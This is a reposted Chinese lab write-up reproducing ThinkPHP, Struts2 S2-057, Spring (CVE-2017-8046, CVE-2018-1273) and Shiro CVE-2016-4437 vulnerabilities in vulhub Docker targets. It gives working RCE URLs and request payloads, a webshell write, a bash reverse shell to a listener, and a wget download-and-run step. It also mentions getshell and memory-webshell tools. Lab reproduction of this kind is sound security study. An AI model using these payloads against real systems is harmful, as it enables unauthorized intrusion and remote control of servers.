0


常见框架漏洞复现

环境

使用Debian虚拟机,配置docker与docker-compose

apt install docker.io
apt install docker-compose

配置后下载vulhub靶场

git clone https://github.com/vulhub/vulhub.git

后发现,环境还是无法启动成功,重新打开终端输入docker hub加速服务

sudo mkdir -p /etc/docker
sudo tee /etc/docker/daemon.json <<EOF
{
    "registry-mirrors": [
        "https://docker.anyhub.us.kg",
        "https://dockerhub.icu",
        "https://docker.awsl9527.cn"
    ]
}
EOF
sudo systemctl daemon-reload
sudo systemctl restart docker

如图成功后,启动容器 ,成功

若想更改端口,则vim docker-compose.yml进入更改

Thinkphp

进入vulhub/thinkphp/5-rce目录下,docker-compose up -d 启动环境,访问(默认端口8080)

方法一

拼接路径,查看用户

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

将system替换为phpinfo,whoami替换为-1,打开探针

拼接,生成木马获取shell(演示使用探针演示),文件在根目录下,访问

/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php phpinfo();?>" >>1.php

方法二

利用工具获取shell,利用蓝鲸thinkphp工具扫描,发现存在漏洞

选择漏洞查看命令是否能执行(第一个与第三个不支持命令)

自己写入木马后,点击getshell后,使用蚁剑测试连接(默认的木马没连上)

struts2(Apache)

S2-057远程执行代码漏洞

进入vulhub/struts2/s2-057目录下,docker-compose up -d 启动环境,拼接/struts2-showcase访问

拼接访问/struts2-showcase/${(123+123)}/actionChain1.action

刷新后可以看到中间实在位置相加了,刷新页面抓包,发送到重放器

将register2改为actionChain1发送,查看响应为302

然后将数字位置改为如下,发送,出现root

%24%7b%20%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%63%74%3d%23%72%65%71%75%65%73%74%5b%27%73%74%72%75%74%73%2e%76%61%6c%75%65%53%74%61%63%6b%27%5d%2e%63%6f%6e%74%65%78%74%29%2e%28%23%63%72%3d%23%63%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%75%3d%23%63%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%75%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%2e%28%23%61%3d%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%69%64%27%29%29%2e%28%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%23%61%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%7d

Spring

Spring Data Rest 远程命令执⾏命令(CVE-2017-8046)

进入vulhub/spring/CVE-2017-8046目录下,docker-compose up -d 启动环境,拼接路径/customers/1访问,刷新使用BP抓包

将抓包文件换为以下,更换为自己的ip与端口,放完包

PATCH /customers/1 HTTP/1.1
Host: ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json-patch+json
Content-Length: 193

[{"op":"replace","path":"T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname","value":"vulhub"}]

查看开启环境的机器,查看docker开启镜像id

docker ps

使用以下两条命令,发现success

docker exec -it c9a1b028f320 /bin/bash
ls /tmp

spring代码执行(CVE-2018-1273)

进入vulhub/spring/CVE-2018-1273目录下,docker-compose up -d 启动环境,拼接路径/users访问,随便输入用户名密码后使用BP抓包

将下面替换为以下,在重放器发送,显示500,并且id显示created创建成功

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/zcc")]=&password=&repeatedPassword=

如上一个CVE-2017-8046一样返回靶场查看,zcc文件已创建

物理机www下写下反弹shell脚本ip为监听机器ip,port为监听端口

bash -i >& /dev/tcp/ip/port 0>&1

将抓包中touch /tmp/zcc改为以下(写下脚本的目录),发送成功

/usr/bin/wget -qO /tmp/shell.sh http://ip/111.sh

查看靶场文件是否写入,写入成功

物理机使用工具开启端口监听

BP中再更改命令为打开文件(如下),还是touch /tmp/zcc位置,发送

/bin/bash /tmp/shell.sh

监听成功

Shiro

进入vulhub/shiro/CVE-2016-4437目录下,docker-compose up -d 启动环境,访问

先验证Shiro框架(Shiro框架特征:响应包中存在字段set-Cookie: rememberMe=deleteMe)

使用BP抓包,添加字段,在重放器发送,发现响应包中存在set-Cookie: rememberMe=deleteMe

Cookie: rememberMe=123

使用shiro反序列化工具,填入地址,点击检测当前密钥,发现存在shiro框架

点击爆破密钥,得到密钥

点击检测当前利用链,得到利用链(若未得到爆破利用链)

来到命令执行,输入whoami执行,得到用户名

来到内存马,生成木马(注意:密码为字母与数字),打开哥斯拉测试连接(将asp改为jsp),成功

此次漏洞复现完毕,欢迎指出错误和讨论

标签: web安全 安全

本文转载自: https://blog.csdn.net/2401_86440467/article/details/140992143
版权归原作者 Jhin-Askeladd 所有, 如有侵权,请联系我们删除。

“常见框架漏洞复现”的评论:

还没有评论